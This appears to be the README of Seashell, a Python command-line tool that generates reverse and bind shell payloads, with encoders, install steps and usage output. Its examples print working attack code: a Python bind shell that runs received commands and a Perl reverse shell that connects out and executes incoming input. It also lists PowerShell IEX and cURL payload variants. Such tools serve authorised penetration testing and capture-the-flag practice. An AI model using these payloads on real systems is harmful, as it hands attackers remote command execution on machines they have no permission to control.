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128 lines (107 loc) · 5.84 KB


Seashell is a python tool for generating shells on the go! It uses the database of and offers the same functionality. Only difference being, it's in your terminal!



I want to thank @0dayCTF and all the contributors of reverse-shell-generator for making this project possible.


Seashell does not use ANY external libraries so you can install it in seconds :D

$ git clone
[ ]
$ cd seashell && python3 -m pip install .

NEW: Payload encoders

With this commit, seashell now added support for payload encoders. As of now there are 2 encoders available: base64 and url. You can also specify the number of iterations the encoder will run through your payload using the --iterations argument.



usage: python3 -m seashell [-h] [--verbose] [-os {windows,mac,linux}] [-ip IP] [-p PORT]
                           [--type {reverse,bind,msfvenom,hoaxshell,listeners}]
                           [--shell {sh,/bin/sh,bash,/bin/bash,cmd,powershell,pwsh,ash,bsh,csh,ksh,zsh,pdksh,tcsh,mksh,dash}]
                           [-P PAYLOAD] [--interactive] [--output OUTPUT] [--encoder {base64,url}]
                           [--iterations {1,2,3,4,5}]

Seashell is a CLI 'reverse' shell generator utility. Happy hacking!

positional arguments:
  term                  Search term to filter payloads (use list to list payloads).

  -h, --help            show this help message and exit
  --verbose, -V, -v     Sets logging level to [DEBUG]
  -os {windows,mac,linux}, -o {windows,mac,linux}
                        Filters results for [given] operating system
  -ip IP                Target IP
  -p PORT, --port PORT  Target port
  --type {reverse,bind,msfvenom,hoaxshell,listeners}, -T {reverse,bind,msfvenom,hoaxshell,listeners}
                        Filters results for [given] payload type
  --shell {sh,/bin/sh,bash,/bin/bash,cmd,powershell,pwsh,ash,bsh,csh,ksh,zsh,pdksh,tcsh,mksh,dash}, -S {sh,/bin/sh,bash,/bin/bash,cmd,powershell,pwsh,ash,bsh,csh,ksh,zsh,pdksh,tcsh,mksh,dash}
                        Shell to use
  -P PAYLOAD, --payload PAYLOAD
                        metasploit payload to use for listener [msfconsole]
  --interactive, -i     Enables interactive mode. Any arguments besides -V will be ignored!
  --output OUTPUT, -O OUTPUT
                        Store payload to file
  --encoder {base64,url}, -e {base64,url}
                        The encoder to use
  --iterations {1,2,3,4,5}, -I {1,2,3,4,5}
                        The number of times to encode the payload

Seashell filters your results based on the shell type and OS specified.

Use list as the search term on both manual and interactive mode to get a list of all the payloads available, matching the specified OS/Shell type.

If you do not find your desired payloads, it might be because the payload you are looking for is not available for linux systems (the default OS used by seashell). ~ Example 3

After finding the ID of the payload you desire to use, you can:

  • Repeat the command and use the ID as the search term if in manual mode
  • Type use ID if in interactive mode

Seashell will then select the appropriate payload.

  • Now you can also list listeners to host your payload. Same way as you would list reverse shell payloads etc.

NEW If you want to store the generated shell in a file, you can use the --output/-O argument in both modes.

Special arguments

  • -S/--shell <SHELL>: You can specify a shell to use (i.e /bin/bash or zsh) as a command line argument
  • -P <PAYLOAD> You can specify a metasploit payload to use in certain payloads as a command line argument.


  • Manual mode
$ python -m seashell -ip localhost -p 1234 -T bind python
[+] Welcome to the sea of shells! Happy pwning >:)
[*] Python3 Bind         70
[*] PHP Bind             71

$ python -m seashell -ip localhost -p 1234 -T bind 70
[*] Welcome to the sea of shells! Happy pwning >:)
[+] Using <Python3 Bind>
python3 -c 'exec("""import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind(("",1234));s1.listen(1);c,a=s1.accept();
while True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(""")'
  • Interactive mode:
$ python -m seashell -i
[+] Welcome to the sea of shells! Happy pwning >:)
~> Enter the IP: localhost
~> Specify the port (default: 4444): 
~> Filter by OS [LINUX, mac, windows]: 
~> Select payload type [REVERSE, bind, msfvenom, hoaxshell]:  
[SEARCH] perl
[*] Perl                 20
[*] Perl no sh           21
[*] curl                 13
[*] telnet               60
[SEARCH] use 21
[+] Using <Perl no sh>
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
  • Payload listing in manual mode
$ python -m seashell -ip localhost -os windows -T hoaxshell list
[+] Welcome to the sea of shells! Happy pwning >:)
[*] Windows CMD cURL     94
[*] PowerShell IEX       95
[*] PowerShell IEX Constr Lang Mode 96
[*] PowerShell Outfile   97
[*] PowerShell Outfile Constr Lang Mode 98
[*] Windows CMD cURL https 99
[*] PowerShell IEX https 100
[*] PowerShell Constr Lang Mode IEX https 101
[*] PowerShell Outfile https 102
[*] PowerShell Outfile Constr Lang Mode https 103